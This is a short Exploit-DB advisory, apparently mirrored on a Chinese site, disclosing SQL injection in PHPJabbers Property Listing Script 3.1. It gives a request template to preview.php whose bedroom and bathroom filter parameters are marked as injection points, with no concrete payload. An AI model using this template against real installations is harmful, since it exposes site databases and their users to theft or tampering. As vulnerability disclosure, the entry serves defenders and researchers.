Property Listing Script 3.1 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-03-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41587/
  • # # # # # 
    # Exploit Title: Property Listing Script v3.1 - SQL Injection
    # Google Dork: N/A
    # Date: 11.03.2017
    # Vendor Homepage: https://www.phpjabbers.com/
    # Software: https://www.phpjabbers.com/property-listing-script/
    # Demo: http://demo.phpjabbers.com/index.php?demo=pls&front=1&lid=1
    # Version: 3.1
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail: ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1[SQL]&max_bedrooms=1[SQL]&min_bathrooms=1[SQL]&max_bathrooms=2[SQL]
    # Etc..
    # # # # #